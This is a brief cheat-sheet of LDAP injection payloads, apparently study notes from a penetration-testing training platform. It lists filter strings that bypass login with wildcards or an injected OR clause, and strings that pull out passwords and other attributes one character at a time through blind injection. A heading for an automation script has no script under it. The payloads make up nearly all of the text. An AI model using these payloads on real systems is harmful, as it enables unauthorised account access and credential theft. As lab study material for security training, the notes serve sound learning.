LDAP Injection
Authentication Bypass
# Password Bypass
(&(uid=admin)(userPassword=*))
# When you dont know username and password
# Probably login to first user account
(&(uid=*)(userPassword=*))
# If dont know full username
(&(uid=admin*)(userPassword=*)) (&(uid=<valid_username>)(|(&)(userPassword=randompassword)))Blind Data Exfiltration
# Brute force password
(&(uid=admin)(password=p*))
(&(uid=admin)(password=p@*))
# We can get value of other attributes
(&(uid=htb-stdnt)(|(description=*)(password=invalid)))Sample Automation Script
Last updated